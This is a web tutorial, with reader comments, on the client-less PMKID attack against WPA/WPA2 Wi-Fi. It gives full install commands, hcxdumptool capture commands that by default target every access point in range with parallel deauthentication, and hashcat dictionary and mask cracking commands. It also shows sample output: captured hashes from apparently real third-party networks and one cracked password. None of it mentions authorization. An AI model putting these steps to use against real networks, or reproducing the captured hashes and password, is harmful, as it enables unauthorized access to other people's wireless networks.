Hacking Wi-Fi without users

A new attack on Wi-Fi without Clients

There are a lot of various attacks on Wi-Fi. The most universal attack (working on almost all access points) is the attack on WPA/WPA2 technology, because it is used in the vast majority of wireless access points. When a Client connects to a WPA/WPA2-enabled Access Point, EAPOL, security protocol, is used during which a step-by-step data exchange is performed between an Access Point and a Client that wants to connect. The essence of the attack lies in the fact that it is necessary to capture completely (or at least part) the transmitted data and find the appropriate password by brute-force. Simply put, you first need to capture a handshake (in the EAPOL phase), and then use brute-force attack to find the correct password.

At each of these two stages there may be difficulties: problems with capturing a handshake can be caused by a variety of reasons, the most fatal of them is the absense of Clients. That is, if there are no connecting clients, then EAPOL protocol is not used, so there is nothing to intercept.

At the hashcat.net forum (topic https://hashcat.net/forum/thread-7717.html), a new method we found that allows you to get the data necessary for brute-force without having to capture a handshake. This new technique allows you to attack Wi-Fi passwords - WPA/WPA2 PSK (Pre-Shared Key).

Wi-Fi technology uses variety implementations and many related technologies and solutions. Therefore, the method described here can work in not all cases - it depends on a vendor and its implementation features. In addition success may depend on the chip of your Wi-Fi adapter.

Further a little theoretical information from the forum, and then an example of a real successful attack according to this technology.

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE).

It is not reported whether a new way of attacking WPA3 was found, but for WPA/WPA2 PSK a new attack was invented, and the necessary tools were also prepared. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single (the first) EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but the authors think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

In this list:

  • IEEE 802.11i: Enhanced security (2004)
  • IEEE 802.11p: WAVE—Wireless Access for the Vehicular Environment (such as ambulances and passenger cars) (July 2010)
  • IEEE 802.11r: Fast BSS transition (FT) (2008)

And in the list there is 802.11q - this standard is not used, the designation is reserved, the authors added it to this list for fun - to look at those who copy-paste texts without any verification.

The main advantages of this attack are as follow:

  • No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string

Attack details

The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.

Example RSN PMKID in the first message of a handshake:

One more example:

Even one more example:

The PMKID is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label "PMK Name", the access point's MAC address and the station's MAC address.

The calculation formula is as follows:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Since the PMK is the same as in a regular EAPOL 4-way handshake this is an ideal attacking vector.

We receive all the data we need in the first EAPOL frame from the AP.

Programs for attack Wi-Fi without Clients in Kali Linux

For this attack, you need three programs:

  • hcxdumptool v4.2.0 or higher - for capturing wireless frames
  • hcxtools v4.2.0 or higher - to extract the data required for brute force
  • hashcat v4.2.0 or higher for password brute-force

It is quite simply to install hcxdumptool and hcxtools in Kali Linux:

# install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install
cd .. # up

# install hcxtools
sudo apt install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools/
make
sudo make install
cd .. # up

rm -rf hcxdumptool hcxtools # cleaning

hashcat in Kali Linux is installed by default, but it also requires proprietary drivers. Installation of nVidia proprietary drivers:

apt update && apt dist-upgrade -y
echo -e "blacklist nouveau\noptions nouveau modeset=0\nalias nouveau off" > /etc/modprobe.d/blacklist-nouveau.conf
update-initramfs -u && reboot
apt install -y ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit

Programs for attack Wi-Fi without Clients in BlackArch

hcxdumptool and hcxtools in this distribution are present in the repository, so they are installed with one command:

sudo pacman -S hcxdumptool hcxtools

How to install Hashcat in Arch Linux/BlackArch is explained here.

An example of a “client-less” attack on Wi-Fi

Let's start with the following command:

sudo hcxdumptool -I

With this command, we get a list of wlan interfaces:

  • c0b6f9daaf3e wlo1 (iwlwifi)
  • 00c0ca900d9f wlp0s20f0u1 (rt2800usb)

And also two warnings:

  • warning: NetworkManager is running with pid 578
  • warning: wpa_supplicant is running with pid 1190

They mean that the programs NetworkManager and wpa_supplicant with process IDs 578 and 1190 are running at the moment. It is highly recommended stopping these programs. This can be done with the kill command, after which specify the pid of processes (change the digits to your values):

sudo kill 578 1190

In theory, you do not need to set the Wi-Fi adapter to monitor mode - hcxdumptool should do it for you, but if the next command arises messages:

interface is not up
failed to init socket

then set the wireless interface into monitor mode manually with commands of the form:

sudo ip link set <interface> down
sudo iw dev <interface> set monitor control
sudo ip link set <interface> up

For example, I want to use the interface wlp0s20f0u1, then my commands look like this:

sudo ip link set wlp0s20f0u1 down
sudo iw dev wlp0s20f0u1 set monitor control
sudo ip link set wlp0s20f0u1 up

Run hcxdumptool to request the PMKID from the AP and to dump the received frames to a file (in pcapng format).

sudo hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15

In the previous command:

  • -o test.pcapng means to save the captured frames to the test.pcapng file of the pcapng format
  • -i wlp0s20f0u1 means to use Wi-Fi wlp0s20f0u1 interface
  • --enable_status 15 means to enable real-time display of EAPOL, PROBEREQUEST/PROBERESPONSE, AUTHENTICATON, ASSOCIATION - you can reduce verbality, see the help: https://en.kali.tools/?p=841

The above command attempts to collect data from all access points within reach, and both “client-less” attack and a classic deauthentication attack are used. If you want to collect PMKID without parallel deauthentication attack, then use the --disable_deauthentications option in addition.

As already mentioned, by default all APs are attacked, if you want to attack only some or only one, then use the --filterlist=<file> option, in the <file> specify the list of MAC addresses (one per line). By default, these targets will NOT be attacked. If you want to attack ONLY the target from the list, then use the --filtermode=2 option.

If you want to attack a specific access point and you know the channel number on which it works, you can specify the -c option, in addition to the --filterlist option (which specify one address) and the option --filtermode=2, after which write the channel number of an AP.

If the AP receives our packet with an association request and supports sending the PMKID, we will see the message [FOUND PMKID]. That is, if [FOUND PMKID] appears, then we have successfully received the PMKID for the access point.

In addition, from time to time, summary data appears, including a powned string, for example, powned=6:

This means that data is captured for six (in my case) access points. This is not necessarily the PMKID - it also takes into account the usual handshakes (if the deauthentication attack was not previously disabled).

Depending on the noise level of the wifi channel, it may take some time to receive the PMKID. The authors recommend running hcxdumptool up to 10 minutes. Data collection can work any time, usually 10 minutes is more than enough. To stop the capture, just press Ctrl+c.

Now run hcxpcaptool to convert the captured data from the pcapng format to a hash format that hashcat accepts:

hcxpcaptool -z test.16800 test.pcapng

Here:

  • test.pcapng is a name of a file from which the data is extracted
  • option -z means to save PMKID, followed by the name of the file.

Data with details:

start reading from test.pcapng
                                                 
summary:                                        
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.10-arch1-1-ARCH
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 2974
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 51
probe requests...............: 18
probe responses..............: 24
association requests.........: 74
association responses........: 161
reassociation requests.......: 3
reassociation responses......: 43
authentications (OPEN SYSTEM): 2262
authentications (BROADCOM)...: 2244
authentications (APPLE)......: 17
EAPOL packets................: 336
EAPOL PMKIDs.................: 9
 
9 PMKID(s) written to test.16800

A total of 9 PMKIDs were saved to the test.16800 file.

A hash file is just a text file, you can open it with any text editor and examine it:

gedit test.16800

The contents of my file:

f2d89d22949759168edf5fd0324764a7*cc4eece1ad58*008092b75244*4e50414145
b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245
a695c4e6a51c1590ea06a458a1860a24*403dec1a88a8*a8880854af50*52756e6763686169
8a8e906b2fb33e0c66833e5efeb4dc8e*403dec187630*7429afe41473*747275655f686f6d6532475f343432
bba899c7bd8719487377dd38a83a2648*403decc272b8*bc926b7c4e2c*5061616e676f6f6e5f3247
5a2da74a1dbe085331dcd9af61a87f50*c88d833bea34*18e29fec7be3*57494e5645524e
e33c525441bf7588c53966addb685a4c*98ded0be2346*fcc2333f478f*546f6e323534386661323535306b616932353133
67661236088d31c937a4646ede4aa7bb*403decbeb114*fcc2333f478f*747275655f686f6d6532475f313036
1bdb53c369ca8c470d9cc990440f056f*2c088c5a4862*60a4d0044de7*426f6f63687532

It seems that nothing is clear? In fact, everything is quite simple. The most interesting part of the hash for us is the one that follows the last asterisk. It contains the name of the Access Point in hexadecimal form. To decode this name into a normal form, use the following command:

echo HEX_string | xxd -r -p

For example, I want to know the name that is coded as 50555245204655524e4954555245, then:

echo 50555245204655524e4954555245 | xxd -r -p

Result:

PURE FURNITURE

To show the names of all access points for which data is captured, use the command:

awk -F "*" '{ system("echo " $4 " | xxd -r -p; echo" ) }' test.16800

If necessary, replace the test.16800 file name with another one.

The columns are the following (all hex encoded):

  • PMKID
  • MAC AP
  • MAC Station
  • ESSID

While not required it is recommended to use options -E, -I, and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.

  • -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic

The command along with these options:

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

New essidlist (mostly consisting of Access Point names, but there may be other very interesting strings), identitylist and usernamelist files may appear. Some files may not appear if nothing is found.

Now we can lunch brute-force.

You can start dictionary attack or mask attack. You can attack all hashes in the file as well as separate ones.

For example, if I want to attack all hashes by dictionary attack, my command is as follows:

hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" test.16800 bin/WiFi-autopwner/dict/rockyou_cleaned.txt

Where:

  • -m 16800 is a hash type to attack (no need to change)
  • -a 0 means dictionary attack
  • -w 3 means the use of an intensive load profile
  • -o "temp_cracked.txt" means to save the hacked passwords in the temp_cracked.txt file
  • test.16800 is a hash file
  • bin/WiFi-autopwner/dict/rockyou_cleaned.txt is the path to the dictionary used for cracking

If you want to crack only single hashes, then in the previous command, instead of the path to the hash file, specify the hash itself by taking it in quotation marks. For example, I want to crack a b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245 hash, then my command:

hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" 'b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245' bin/WiFi-autopwner/dict/rockyou_cleaned.txt

For a mask attack, use the following command:

hashcat -m 16800 -a 3 -w 3 -o "temp2_cracked.txt" test.16800 ?d?d?d?d?d?d?d?d

Where:

  • -m 16800 is a hash type to attack (no need to change)
  • -a 3 means a mask attack
  • -w 3 means the use of an intensive load profile
  • -o "temp2_cracked.txt" means to save the hacked passwords in the temp2_cracked.txt file
  • test.16800 is a hash file
  • ?d?d?d?d?d?d?d?d is the mask for attack, it means a password of eight characters in length, consisting entirely of digits

If you want to crack only single hashes, then in the previous command, instead of the path to the hash file, specify the hash itself by taking it in quotation marks. For example, I want to crack a b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245 hash, then my command:

hashcat -m 16800 -a 3 -w 3 -o "temp2_cracked.txt" 'b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245' ?d?d?d?d?d?d?d?d

If the password is found, it will be displayed, and also saved in the file temp_cracked.txt or temp2_cracked.txt.

In this case, the records will have approximately the following form:

fa9a5dd2fb9029bfc9f4d1bd4e384bfb*403decc272b8*7081eb739a56*5061616e676f6f6e5f3247:00001777

That is, this is the original hash, after which a password is added in clear form through the colon. In this case, the password 00001777, in order to decode the name of the access point, the already familiar construction is used:

echo 5061616e676f6f6e5f3247 | xxd -r -p
Paangoon_2G

The results of the attack:

The first dictionary attack did not succeed. But the second mask attack hacked 2 of 9 passwords.

Conclusion

This attack is an excellent addition to the already existing ones. With the help of it there is a real chance to get a password from completely “hopeless” Access Points (without clients and with disabled WPS).

See also ‘Hacking Wi-Fi without users in Aircrack-ng’.

Recommended for you:

6 Comments to Hacking Wi-Fi without users

  1. 0xIslamTaha says:

    thanks for your great effort.

  2. soufiane says:

     

    a good article well explain clear.. a good job.. thank you very much

  3. nbctcp says:

    error when installing nvidia-cuda-toolkit

    since I don't have cuda chip. I can't test that

    which of these work in this link

    https://forums.kali.org/showthread.php?41684-Kali-2018-2-Installing-Nvidia-Driver-and-Cuda

  4. ahmad says:

    this whole website is so great . Thank You

  5. Mike says:

    But the real amazing part of hcxdumptool / hcxtools is the ability to "hack" a client, without an access point (AP-LESS attack vector).

Leave a Reply to nbctcp Cancel reply

Your email address will not be published. Required fields are marked *